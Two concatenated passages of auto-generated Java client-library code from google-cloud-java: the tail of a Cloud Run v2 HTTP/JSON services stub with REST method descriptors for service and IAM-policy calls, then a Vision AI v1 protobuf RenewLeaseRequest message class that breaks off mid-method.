HashMap<>(); ProtoRestSerializer<UpdateServiceRequest> serializer = ProtoRestSerializer.create(); serializer.putQueryParam( fields, "allowMissing", request.getAllowMissing()); serializer.putQueryParam(fields, "updateMask", request.getUpdateMask()); serializer.putQueryParam( fields, "validateOnly", request.getValidateOnly()); serializer.putQueryParam(fields, "$alt", "json;enum-encoding=int"); return fields; }) .setRequestBodyExtractor( request -> ProtoRestSerializer.create() .toBody("service", request.getService(), true)) .build()) .setResponseParser( ProtoMessageResponseParser.<Operation>newBuilder() .setDefaultInstance(Operation.getDefaultInstance()) .setDefaultTypeRegistry(typeRegistry) .build()) .setOperationSnapshotFactory( (UpdateServiceRequest request, Operation response) -> HttpJsonOperationSnapshot.create(response)) .build(); private static final ApiMethodDescriptor<DeleteServiceRequest, Operation> deleteServiceMethodDescriptor = ApiMethodDescriptor.<DeleteServiceRequest, Operation>newBuilder() .setFullMethodName("google.cloud.run.v2.Services/DeleteService") .setHttpMethod("DELETE") .setType(ApiMethodDescriptor.MethodType.UNARY) .setRequestFormatter( ProtoMessageRequestFormatter.<DeleteServiceRequest>newBuilder() .setPath( "/v2/{name=projects/*/locations/*/services/*}", request -> { Map<String, String> fields = new HashMap<>(); ProtoRestSerializer<DeleteServiceRequest> serializer = ProtoRestSerializer.create(); serializer.putPathParam(fields, "name", request.getName()); return fields; }) .setQueryParamsExtractor( request -> { Map<String, List<String>> fields = new HashMap<>(); ProtoRestSerializer<DeleteServiceRequest> serializer = ProtoRestSerializer.create(); serializer.putQueryParam(fields, "etag", request.getEtag()); serializer.putQueryParam( fields, "validateOnly", request.getValidateOnly()); serializer.putQueryParam(fields, "$alt", "json;enum-encoding=int"); return fields; }) .setRequestBodyExtractor(request -> null) .build()) .setResponseParser( ProtoMessageResponseParser.<Operation>newBuilder() .setDefaultInstance(Operation.getDefaultInstance()) .setDefaultTypeRegistry(typeRegistry) .build()) .setOperationSnapshotFactory( (DeleteServiceRequest request, Operation response) -> HttpJsonOperationSnapshot.create(response)) .build(); private static final ApiMethodDescriptor<GetIamPolicyRequest, Policy> getIamPolicyMethodDescriptor = ApiMethodDescriptor.<GetIamPolicyRequest, Policy>newBuilder() .setFullMethodName("google.cloud.run.v2.Services/GetIamPolicy") .setHttpMethod("GET") .setType(ApiMethodDescriptor.MethodType.UNARY) .setRequestFormatter( ProtoMessageRequestFormatter.<GetIamPolicyRequest>newBuilder() .setPath( "/v2/{resource=projects/*/locations/*/services/*}:getIamPolicy", request -> { Map<String, String> fields = new HashMap<>(); ProtoRestSerializer<GetIamPolicyRequest> serializer = ProtoRestSerializer.create(); serializer.putPathParam(fields, "resource", request.getResource()); return fields; }) .setQueryParamsExtractor( request -> { Map<String, List<String>> fields = new HashMap<>(); ProtoRestSerializer<GetIamPolicyRequest> serializer = ProtoRestSerializer.create(); serializer.putQueryParam(fields, "options", request.getOptions()); serializer.putQueryParam(fields, "$alt", "json;enum-encoding=int"); return fields; }) .setRequestBodyExtractor(request -> null) .build()) .setResponseParser( ProtoMessageResponseParser.<Policy>newBuilder() .setDefaultInstance(Policy.getDefaultInstance()) .setDefaultTypeRegistry(typeRegistry) .build()) .build(); private static final ApiMethodDescriptor<SetIamPolicyRequest, Policy> setIamPolicyMethodDescriptor = ApiMethodDescriptor.<SetIamPolicyRequest, Policy>newBuilder() .setFullMethodName("google.cloud.run.v2.Services/SetIamPolicy") .setHttpMethod("POST") .setType(ApiMethodDescriptor.MethodType.UNARY) .setRequestFormatter( ProtoMessageRequestFormatter.<SetIamPolicyRequest>newBuilder() .setPath( "/v2/{resource=projects/*/locations/*/services/*}:setIamPolicy", request -> { Map<String, String> fields = new HashMap<>(); ProtoRestSerializer<SetIamPolicyRequest> serializer = ProtoRestSerializer.create(); serializer.putPathParam(fields, "resource", request.getResource()); return fields; }) .setQueryParamsExtractor( request -> { Map<String, List<String>> fields = new HashMap<>(); ProtoRestSerializer<SetIamPolicyRequest> serializer = ProtoRestSerializer.create(); serializer.putQueryParam(fields, "$alt", "json;enum-encoding=int"); return fields; }) .setRequestBodyExtractor( request -> ProtoRestSerializer.create() .toBody("*", request.toBuilder().clearResource().build(), true)) .build()) .setResponseParser( ProtoMessageResponseParser.<Policy>newBuilder() .setDefaultInstance(Policy.getDefaultInstance()) .setDefaultTypeRegistry(typeRegistry) .build()) .build(); private static final ApiMethodDescriptor<TestIamPermissionsRequest, TestIamPermissionsResponse> testIamPermissionsMethodDescriptor = ApiMethodDescriptor.<TestIamPermissionsRequest, TestIamPermissionsResponse>newBuilder() .setFullMethodName("google.cloud.run.v2.Services/TestIamPermissions") .setHttpMethod("POST") .setType(ApiMethodDescriptor.MethodType.UNARY) .setRequestFormatter( ProtoMessageRequestFormatter.<TestIamPermissionsRequest>newBuilder() .setPath( "/v2/{resource=projects/*/locations/*/services/*}:testIamPermissions", request -> { Map<String, String> fields = new HashMap<>(); ProtoRestSerializer<TestIamPermissionsRequest> serializer = ProtoRestSerializer.create(); serializer.putPathParam(fields, "resource", request.getResource()); return fields; }) .setQueryParamsExtractor( request -> { Map<String, List<String>> fields = new HashMap<>(); ProtoRestSerializer<TestIamPermissionsRequest> serializer = ProtoRestSerializer.create(); serializer.putQueryParam(fields, "$alt", "json;enum-encoding=int"); return fields; }) .setRequestBodyExtractor( request -> ProtoRestSerializer.create() .toBody("*", request.toBuilder().clearResource().build(), true)) .build()) .setResponseParser( ProtoMessageResponseParser.<TestIamPermissionsResponse>newBuilder() .setDefaultInstance(TestIamPermissionsResponse.getDefaultInstance()) .setDefaultTypeRegistry(typeRegistry) .build()) .build(); private final UnaryCallable<CreateServiceRequest, Operation> createServiceCallable; private final OperationCallable<CreateServiceRequest, Service, Service> createServiceOperationCallable; private final UnaryCallable<GetServiceRequest, Service> getServiceCallable; private final UnaryCallable<ListServicesRequest, ListServicesResponse> listServicesCallable; private final UnaryCallable<ListServicesRequest, ListServicesPagedResponse> listServicesPagedCallable; private final UnaryCallable<UpdateServiceRequest, Operation> updateServiceCallable; private final OperationCallable<UpdateServiceRequest, Service, Service> updateServiceOperationCallable; private final UnaryCallable<DeleteServiceRequest, Operation> deleteServiceCallable; private final OperationCallable<DeleteServiceRequest, Service, Service> deleteServiceOperationCallable; private final UnaryCallable<GetIamPolicyRequest, Policy> getIamPolicyCallable; private final UnaryCallable<SetIamPolicyRequest, Policy> setIamPolicyCallable; private final UnaryCallable<TestIamPermissionsRequest, TestIamPermissionsResponse> testIamPermissionsCallable; private final BackgroundResource backgroundResources; private final HttpJsonOperationsStub httpJsonOperationsStub; private final HttpJsonStubCallableFactory callableFactory; private static final PathTemplate CREATE_SERVICE_0_PATH_TEMPLATE = PathTemplate.create("projects/*/locations/{location=*}"); private static final PathTemplate GET_SERVICE_0_PATH_TEMPLATE = PathTemplate.create("projects/*/locations/{location=*}/**"); private static final PathTemplate LIST_SERVICES_0_PATH_TEMPLATE = PathTemplate.create("projects/*/locations/{location=*}"); private static final PathTemplate UPDATE_SERVICE_0_PATH_TEMPLATE = PathTemplate.create("projects/*/locations/{location=*}/**"); private static final PathTemplate DELETE_SERVICE_0_PATH_TEMPLATE = PathTemplate.create("projects/*/locations/{location=*}/**"); public static final HttpJsonServicesStub create(ServicesStubSettings settings) throws IOException { return new HttpJsonServicesStub(settings, ClientContext.create(settings)); } public static final HttpJsonServicesStub create(ClientContext clientContext) throws IOException { return new HttpJsonServicesStub( ServicesStubSettings.newHttpJsonBuilder().build(), clientContext); } public static final HttpJsonServicesStub create( ClientContext clientContext, HttpJsonStubCallableFactory callableFactory) throws IOException { return new HttpJsonServicesStub( ServicesStubSettings.newHttpJsonBuilder().build(), clientContext, callableFactory); } /** * Constructs an instance of HttpJsonServicesStub, using the given settings. This is protected so * that it is easy to make a subclass, but otherwise, the static factory methods should be * preferred. */ protected HttpJsonServicesStub(ServicesStubSettings settings, ClientContext clientContext) throws IOException { this(settings, clientContext, new HttpJsonServicesCallableFactory()); } /** * Constructs an instance of HttpJsonServicesStub, using the given settings. This is protected so * that it is easy to make a subclass, but otherwise, the static factory methods should be * preferred. */ protected HttpJsonServicesStub( ServicesStubSettings settings, ClientContext clientContext, HttpJsonStubCallableFactory callableFactory) throws IOException { this.callableFactory = callableFactory; this.httpJsonOperationsStub = HttpJsonOperationsStub.create( clientContext, callableFactory, typeRegistry, ImmutableMap.<String, HttpRule>builder() .put( "google.longrunning.Operations.DeleteOperation", HttpRule.newBuilder() .setDelete("/v2/{name=projects/*/locations/*/operations/*}") .build()) .put( "google.longrunning.Operations.GetOperation", HttpRule.newBuilder() .setGet("/v2/{name=projects/*/locations/*/operations/*}") .build()) .put( "google.longrunning.Operations.ListOperations", HttpRule.newBuilder() .setGet("/v2/{name=projects/*/locations/*}/operations") .build()) .put( "google.longrunning.Operations.WaitOperation", HttpRule.newBuilder() .setPost("/v2/{name=projects/*/locations/*/operations/*}:wait") .build()) .build()); HttpJsonCallSettings<CreateServiceRequest, Operation> createServiceTransportSettings = HttpJsonCallSettings.<CreateServiceRequest, Operation>newBuilder() .setMethodDescriptor(createServiceMethodDescriptor) .setTypeRegistry(typeRegistry) .setParamsExtractor( request -> { RequestParamsBuilder builder = RequestParamsBuilder.create(); builder.add(request.getParent(), "location", CREATE_SERVICE_0_PATH_TEMPLATE); return builder.build(); }) .build(); HttpJsonCallSettings<GetServiceRequest, Service> getServiceTransportSettings = HttpJsonCallSettings.<GetServiceRequest, Service>newBuilder() .setMethodDescriptor(getServiceMethodDescriptor) .setTypeRegistry(typeRegistry) .setParamsExtractor( request -> { RequestParamsBuilder builder = RequestParamsBuilder.create(); builder.add(request.getName(), "location", GET_SERVICE_0_PATH_TEMPLATE); return builder.build(); }) .build(); HttpJsonCallSettings<ListServicesRequest, ListServicesResponse> listServicesTransportSettings = HttpJsonCallSettings.<ListServicesRequest, ListServicesResponse>newBuilder() .setMethodDescriptor(listServicesMethodDescriptor) .setTypeRegistry(typeRegistry) .setParamsExtractor( request -> { RequestParamsBuilder builder = RequestParamsBuilder.create(); builder.add(request.getParent(), "location", LIST_SERVICES_0_PATH_TEMPLATE); return builder.build(); }) .build(); HttpJsonCallSettings<UpdateServiceRequest, Operation> updateServiceTransportSettings = HttpJsonCallSettings.<UpdateServiceRequest, Operation>newBuilder() .setMethodDescriptor(updateServiceMethodDescriptor) .setTypeRegistry(typeRegistry) .setParamsExtractor( request -> { RequestParamsBuilder builder = RequestParamsBuilder.create(); if (request.getService() != null) { builder.add( request.getService().getName(), "location", UPDATE_SERVICE_0_PATH_TEMPLATE); } return builder.build(); }) .build(); HttpJsonCallSettings<DeleteServiceRequest, Operation> deleteServiceTransportSettings = HttpJsonCallSettings.<DeleteServiceRequest, Operation>newBuilder() .setMethodDescriptor(deleteServiceMethodDescriptor) .setTypeRegistry(typeRegistry) .setParamsExtractor( request -> { RequestParamsBuilder builder = RequestParamsBuilder.create(); builder.add(request.getName(), "location", DELETE_SERVICE_0_PATH_TEMPLATE); return builder.build(); }) .build(); HttpJsonCallSettings<GetIamPolicyRequest, Policy> getIamPolicyTransportSettings = HttpJsonCallSettings.<GetIamPolicyRequest, Policy>newBuilder() .setMethodDescriptor(getIamPolicyMethodDescriptor) .setTypeRegistry(typeRegistry) .setParamsExtractor( request -> { RequestParamsBuilder builder = RequestParamsBuilder.create(); builder.add("resource", String.valueOf(request.getResource())); return builder.build(); }) .build(); HttpJsonCallSettings<SetIamPolicyRequest, Policy> setIamPolicyTransportSettings = HttpJsonCallSettings.<SetIamPolicyRequest, Policy>newBuilder() .setMethodDescriptor(setIamPolicyMethodDescriptor) .setTypeRegistry(typeRegistry) .setParamsExtractor( request -> { RequestParamsBuilder builder = RequestParamsBuilder.create(); builder.add("resource", String.valueOf(request.getResource())); return builder.build(); }) .build(); HttpJsonCallSettings<TestIamPermissionsRequest, TestIamPermissionsResponse> testIamPermissionsTransportSettings = HttpJsonCallSettings.<TestIamPermissionsRequest, TestIamPermissionsResponse>newBuilder() .setMethodDescriptor(testIamPermissionsMethodDescriptor) .setTypeRegistry(typeRegistry) .setParamsExtractor( request -> { RequestParamsBuilder builder = RequestParamsBuilder.create(); builder.add("resource", String.valueOf(request.getResource())); return builder.build(); }) .build(); this.createServiceCallable = callableFactory.createUnaryCallable( createServiceTransportSettings, settings.createServiceSettings(), clientContext); this.createServiceOperationCallable = callableFactory.createOperationCallable( createServiceTransportSettings, settings.createServiceOperationSettings(), clientContext, httpJsonOperationsStub); this.getServiceCallable = callableFactory.createUnaryCallable( getServiceTransportSettings, settings.getServiceSettings(), clientContext); this.listServicesCallable = callableFactory.createUnaryCallable( listServicesTransportSettings, settings.listServicesSettings(), clientContext); this.listServicesPagedCallable = callableFactory.createPagedCallable( listServicesTransportSettings, settings.listServicesSettings(), clientContext); this.updateServiceCallable = callableFactory.createUnaryCallable( updateServiceTransportSettings, settings.updateServiceSettings(), clientContext); this.updateServiceOperationCallable = callableFactory.createOperationCallable( updateServiceTransportSettings, settings.updateServiceOperationSettings(), clientContext, httpJsonOperationsStub); this.deleteServiceCallable = callableFactory.createUnaryCallable( deleteServiceTransportSettings, settings.deleteServiceSettings(), clientContext); this.deleteServiceOperationCallable = callableFactory.createOperationCallable( deleteServiceTransportSettings, settings.deleteServiceOperationSettings(), clientContext, httpJsonOperationsStub); this.getIamPolicyCallable = callableFactory.createUnaryCallable( getIamPolicyTransportSettings, settings.getIamPolicySettings(), clientContext); this.setIamPolicyCallable = callableFactory.createUnaryCallable( setIamPolicyTransportSettings, settings.setIamPolicySettings(), clientContext); this.testIamPermissionsCallable = callableFactory.createUnaryCallable( testIamPermissionsTransportSettings, settings.testIamPermissionsSettings(), clientContext); this.backgroundResources = new BackgroundResourceAggregation(clientContext.getBackgroundResources()); } @InternalApi public static List<ApiMethodDescriptor> getMethodDescriptors() { List<ApiMethodDescriptor> methodDescriptors = new ArrayList<>(); methodDescriptors.add(createServiceMethodDescriptor); methodDescriptors.add(getServiceMethodDescriptor); methodDescriptors.add(listServicesMethodDescriptor); methodDescriptors.add(updateServiceMethodDescriptor); methodDescriptors.add(deleteServiceMethodDescriptor); methodDescriptors.add(getIamPolicyMethodDescriptor); methodDescriptors.add(setIamPolicyMethodDescriptor); methodDescriptors.add(testIamPermissionsMethodDescriptor); return methodDescriptors; } public HttpJsonOperationsStub getHttpJsonOperationsStub() { return httpJsonOperationsStub; } @Override public UnaryCallable<CreateServiceRequest, Operation> createServiceCallable() { return createServiceCallable; } @Override public OperationCallable<CreateServiceRequest, Service, Service> createServiceOperationCallable() { return createServiceOperationCallable; } @Override public UnaryCallable<GetServiceRequest, Service> getServiceCallable() { return getServiceCallable; } @Override public UnaryCallable<ListServicesRequest, ListServicesResponse> listServicesCallable() { return listServicesCallable; } @Override public UnaryCallable<ListServicesRequest, ListServicesPagedResponse> listServicesPagedCallable() { return listServicesPagedCallable; } @Override public UnaryCallable<UpdateServiceRequest, Operation> updateServiceCallable() { return updateServiceCallable; } @Override public OperationCallable<UpdateServiceRequest, Service, Service> updateServiceOperationCallable() { return updateServiceOperationCallable; } @Override public UnaryCallable<DeleteServiceRequest, Operation> deleteServiceCallable() { return deleteServiceCallable; } @Override public OperationCallable<DeleteServiceRequest, Service, Service> deleteServiceOperationCallable() { return deleteServiceOperationCallable; } @Override public UnaryCallable<GetIamPolicyRequest, Policy> getIamPolicyCallable() { return getIamPolicyCallable; } @Override public UnaryCallable<SetIamPolicyRequest, Policy> setIamPolicyCallable() { return setIamPolicyCallable; } @Override public UnaryCallable<TestIamPermissionsRequest, TestIamPermissionsResponse> testIamPermissionsCallable() { return testIamPermissionsCallable; } @Override public final void close() { try { backgroundResources.close(); } catch (RuntimeException e) { throw e; } catch (Exception e) { throw new IllegalStateException("Failed to close resource", e); } } @Override public void shutdown() { backgroundResources.shutdown(); } @Override public boolean isShutdown() { return backgroundResources.isShutdown(); } @Override public boolean isTerminated() { return backgroundResources.isTerminated(); } @Override public void shutdownNow() { backgroundResources.shutdownNow(); } @Override public boolean awaitTermination(long duration, TimeUnit unit) throws InterruptedException { return backgroundResources.awaitTermination(duration, unit); } }
googleapis/google-cloud-java
35,599
java-visionai/proto-google-cloud-visionai-v1/src/main/java/com/google/cloud/visionai/v1/RenewLeaseRequest.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/visionai/v1/streaming_service.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.visionai.v1; /** * * * <pre> * Request message for renewing a lease. * </pre> * * Protobuf type {@code google.cloud.visionai.v1.RenewLeaseRequest} */ public final class RenewLeaseRequest extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.visionai.v1.RenewLeaseRequest) RenewLeaseRequestOrBuilder { private static final long serialVersionUID = 0L; // Use RenewLeaseRequest.newBuilder() to construct. private RenewLeaseRequest(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private RenewLeaseRequest() { id_ = ""; series_ = ""; owner_ = ""; } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new RenewLeaseRequest(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.visionai.v1.StreamingServiceProto .internal_static_google_cloud_visionai_v1_RenewLeaseRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.visionai.v1.StreamingServiceProto .internal_static_google_cloud_visionai_v1_RenewLeaseRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.visionai.v1.RenewLeaseRequest.class, com.google.cloud.visionai.v1.RenewLeaseRequest.Builder.class); } private int bitField0_; public static final int ID_FIELD_NUMBER = 1; @SuppressWarnings("serial") private volatile java.lang.Object id_ = ""; /** * * * <pre> * Lease id. * </pre> * * <code>string id = 1;</code> * * @return The id. */ @java.lang.Override public java.lang.String getId() { java.lang.Object ref = id_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); id_ = s; return s; } } /** * * * <pre> * Lease id. * </pre> * * <code>string id = 1;</code> * * @return The bytes for id. */ @java.lang.Override public com.google.protobuf.ByteString getIdBytes() { java.lang.Object ref = id_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); id_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int SERIES_FIELD_NUMBER = 2; @SuppressWarnings("serial") private volatile java.lang.Object series_ = ""; /** * * * <pre> * Series name. * </pre> * * <code>string series = 2;</code> * * @return The series. */ @java.lang.Override public java.lang.String getSeries() { java.lang.Object ref = series_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); series_ = s; return s; } } /** * * * <pre> * Series name. * </pre> * * <code>string series = 2;</code> * * @return The bytes for series. */ @java.lang.Override public com.google.protobuf.ByteString getSeriesBytes() { java.lang.Object ref = series_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); series_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int OWNER_FIELD_NUMBER = 3; @SuppressWarnings("serial") private volatile java.lang.Object owner_ = ""; /** * * * <pre> * Lease owner. * </pre> * * <code>string owner = 3;</code> * * @return The owner. */ @java.lang.Override public java.lang.String getOwner() { java.lang.Object ref = owner_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); owner_ = s; return s; } } /** * * * <pre> * Lease owner. * </pre> * * <code>string owner = 3;</code> * * @return The bytes for owner. */ @java.lang.Override public com.google.protobuf.ByteString getOwnerBytes() { java.lang.Object ref = owner_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); owner_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int TERM_FIELD_NUMBER = 4; private com.google.protobuf.Duration term_; /** * * * <pre> * Lease term. * </pre> * * <code>.google.protobuf.Duration term = 4;</code> * * @return Whether the term field is set. */ @java.lang.Override public boolean hasTerm() { return ((bitField0_ & 0x00000001) != 0); } /** * * * <pre> * Lease term. * </pre> * * <code>.google.protobuf.Duration term = 4;</code> * * @return The term. */ @java.lang.Override public com.google.protobuf.Duration getTerm() { return term_ == null ? com.google.protobuf.Duration.getDefaultInstance() : term_; } /** * * * <pre> * Lease term. * </pre> * * <code>.google.protobuf.Duration term = 4;</code> */ @java.lang.Override public com.google.protobuf.DurationOrBuilder getTermOrBuilder() { return term_ == null ? com.google.protobuf.Duration.getDefaultInstance() : term_; } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(id_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 1, id_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(series_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 2, series_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(owner_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 3, owner_); } if (((bitField0_ & 0x00000001) != 0)) { output.writeMessage(4, getTerm()); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(id_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(1, id_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(series_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(2, series_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(owner_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(3, owner_); } if (((bitField0_ & 0x00000001) != 0)) { size += com.google.protobuf.CodedOutputStream.computeMessageSize(4, getTerm()); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.visionai.v1.RenewLeaseRequest)) { return super.equals(obj); } com.google.cloud.visionai.v1.RenewLeaseRequest other = (com.google.cloud.visionai.v1.RenewLeaseRequest) obj; if (!getId().equals(other.getId())) return false; if (!getSeries().equals(other.getSeries())) return false; if (!getOwner().equals(other.getOwner())) return false; if (hasTerm() != other.hasTerm()) return false; if (hasTerm()) { if (!getTerm().equals(other.getTerm())) return false; } if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); hash = (37 * hash) + ID_FIELD_NUMBER; hash = (53 * hash) + getId().hashCode(); hash = (37 * hash) + SERIES_FIELD_NUMBER; hash = (53 * hash) + getSeries().hashCode(); hash = (37 * hash) + OWNER_FIELD_NUMBER; hash = (53 * hash) + getOwner().hashCode(); if (hasTerm()) { hash = (37 * hash) + TERM_FIELD_NUMBER; hash = (53 * hash) + getTerm().hashCode(); } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.visionai.v1.RenewLeaseRequest parseFrom(java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.visionai.v1.RenewLeaseRequest parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.visionai.v1.RenewLeaseRequest parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.visionai.v1.RenewLeaseRequest parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.visionai.v1.RenewLeaseRequest parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.visionai.v1.RenewLeaseRequest parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.visionai.v1.RenewLeaseRequest parseFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.visionai.v1.RenewLeaseRequest parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.visionai.v1.RenewLeaseRequest parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.visionai.v1.RenewLeaseRequest parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.visionai.v1.RenewLeaseRequest parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.visionai.v1.RenewLeaseRequest parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.cloud.visionai.v1.RenewLeaseRequest prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * Request message for renewing a lease. * </pre> * * Protobuf type {@code google.cloud.visionai.v1.RenewLeaseRequest} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.visionai.v1.RenewLeaseRequest) com.google.cloud.visionai.v1.RenewLeaseRequestOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.visionai.v1.StreamingServiceProto .internal_static_google_cloud_visionai_v1_RenewLeaseRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.visionai.v1.StreamingServiceProto .internal_static_google_cloud_visionai_v1_RenewLeaseRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.visionai.v1.RenewLeaseRequest.class, com.google.cloud.visionai.v1.RenewLeaseRequest.Builder.class); } // Construct using com.google.cloud.visionai.v1.RenewLeaseRequest.newBuilder() private Builder() { maybeForceBuilderInitialization(); } private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); maybeForceBuilderInitialization(); } private void maybeForceBuilderInitialization() { if (com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders) { getTermFieldBuilder(); } } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; id_ = ""; series_ = ""; owner_ = ""; term_ = null; if (termBuilder_ != null) { termBuilder_.dispose(); termBuilder_ = null; } return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.visionai.v1.StreamingServiceProto .internal_static_google_cloud_visionai_v1_RenewLeaseRequest_descriptor; } @java.lang.Override public com.google.cloud.visionai.v1.RenewLeaseRequest getDefaultInstanceForType() { return com.google.cloud.visionai.v1.RenewLeaseRequest.getDefaultInstance(); } @java.lang.Override public com.google.cloud.visionai.v1.RenewLeaseRequest build() { com.google.cloud.visionai.v1.RenewLeaseRequest result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.visionai.v1.RenewLeaseRequest buildPartial() { com.google.cloud.visionai.v1.RenewLeaseRequest result = new com.google.cloud.visionai.v1.RenewLeaseRequest(this); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartial0(com.google.cloud.visionai.v1.RenewLeaseRequest result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000001) != 0)) { result.id_ = id_; } if (((from_bitField0_ & 0x00000002) != 0)) { result.series_ = series_; } if (((from_bitField0_ & 0x00000004) != 0)) { result.owner_ = owner_; } int 